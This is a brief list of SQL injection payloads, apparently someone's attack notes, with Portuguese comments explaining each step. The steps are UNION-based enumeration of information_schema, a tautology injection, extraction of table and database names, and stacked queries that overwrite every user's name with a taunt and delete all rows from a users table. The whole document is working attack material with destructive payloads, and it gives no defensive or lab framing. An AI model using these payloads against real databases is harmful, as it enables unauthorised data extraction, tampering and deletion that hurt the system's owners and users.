UNION SELECT * FROM information_schema.tables ;-- QUERY PARA PEGAR OS DADOS DO SCHEMA DO BANCO

OR 'a' = 'a' UNION SELECT 1,2,3,4,5 FROM information_schema.tables;--TENTANDO REALIZAR SELECT COM UNION

UNION SELECT 'b39a31ab-433e-4a64-8970-d4b026b33ffb',CAST(2 AS VARCHAR),CAST(2 AS VARCHAR),CAST(2 AS VARCHAR) FROM information_schema.tables ;-- REALIZANDO DOIS SELECTS

UNION SELECT 'b39a31ab-433e-4a64-8970-d4b026b33ffb',CAST(table_name AS VARCHAR),CAST(table_catalog AS VARCHAR),CAST(2 AS VARCHAR) FROM information_schema.tables WHERE table_schema = 'public';-- COLETANDO NOME DAS TABELAS E BANCO DE DADOS

; UPDATE users SET name = 'JÁ ERA PERDEU PLAYBOY';-- ATUALIZANDO TODOS OS NOMES DOS USUÁRIOS

; DELETE FROM users;-- DELETANDO TODOS OS DADOS DA TABELA USERS